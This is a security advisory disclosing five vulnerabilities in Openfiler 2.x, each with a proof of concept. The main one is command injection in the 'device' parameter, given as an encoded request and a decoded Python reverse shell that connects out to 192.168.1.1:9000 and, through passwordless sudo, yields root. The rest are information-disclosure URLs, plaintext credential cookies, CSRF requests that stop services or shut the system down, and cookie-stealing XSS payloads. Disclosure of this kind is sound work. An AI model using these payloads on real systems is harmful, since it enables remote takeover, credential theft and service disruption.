Openfiler v2.x multiple vulnerabilities

Openfiler v2.x allows authenticated remote attackers to gain root access.

Software

Software Link: http://www.openfiler.com/

Vulnerable Versions: 2.x (Tested: 2.3, 2.99.1, 2.99.2)

Vendor Notification:

# 2012-09-04 # submitted bug 1251

# 2012-09-06 # advisory released

# 0x00 # Arbitrary Command Execution # Authenticated

It is possible to execute arbitrary commands remotely as the 'openfiler' user by injecting commands into the 'device' parameter of '/opt/openfiler/var/www/htdocs/admin/system.html'

The 'openfiler' user is part of the 'wheel' group and can 'sudo /bin/bash' without providing a password.

The 'system.html' file uses user controlled data from the 'device' parameter to create a new 'NetworkCard' object. The class constructor in 'network.inc' calls exec() with the supplied data.

The following proof of concept is available:

GET /admin/system.html?step=2&device=lo%26%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22%31%39%32%2e%31%36%38%2e%31%2e%31%5c%22%3b%70%6f%72%74%3d%39%30%30%30%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22%26 HTTP/1.1
Host: openfiler-host:446
Cookie: usercookie=openfiler; passcookie=password;

# [Decoded] #
device=lo&python -c "import socket,subprocess,os;host=\"192.168.1.1\";port=9000;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"&

# 0x01 # Information Disclosure # Unauthenticated

The following proof of concept is available:

https://openfiler-host:446/phpinfo.html
https://openfiler-host:446/uptime.html

# 0x02 # Credential Disclosure # Authenticated

The 'usercookie' and 'passcookie' cookies contain the username and password, respectively, in plain text. Furthermore, these cookies are not protected with the 'HttpOnly' flag.

# 0x03 # Cross-Site Request Forgery # Authenticated

The following proof of concept is available:

# Start/Stop a service
https://openfiler-host:446/admin/services.html?service=smb&action=stop
https://openfiler-host:446/admin/services.html?service=smb&action=start

# Shutdown
POST /admin/system_shutdown.html HTTP/1.1
Host: openfiler-host:446
Cookie: usercookie=openfiler; passcookie=password;
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

shutdowntype=halt&delay=0&action=Shutdown

# 0x04 # Reflected Cross-Site Scripting # Authenticated

The following proof of concept is available:

https://openfiler-host:446/admin/system.html?step=2&device="><script>alert(document.cookie);</script><p+"
https://openfiler-host:446/admin/volumes_iscsi_targets.html?targetName="><script>alert(document.cookie);</script><p+"

Reference

# OWASP: Information Leakage

# OWASP: Code Injection

# OWASP: Cross-Site Scripting (XSS)

# OWASP: Cross-Site Request Forgery (CSRF)

Appendix

[TXT] Openfiler v2.x multiple vulnerabilities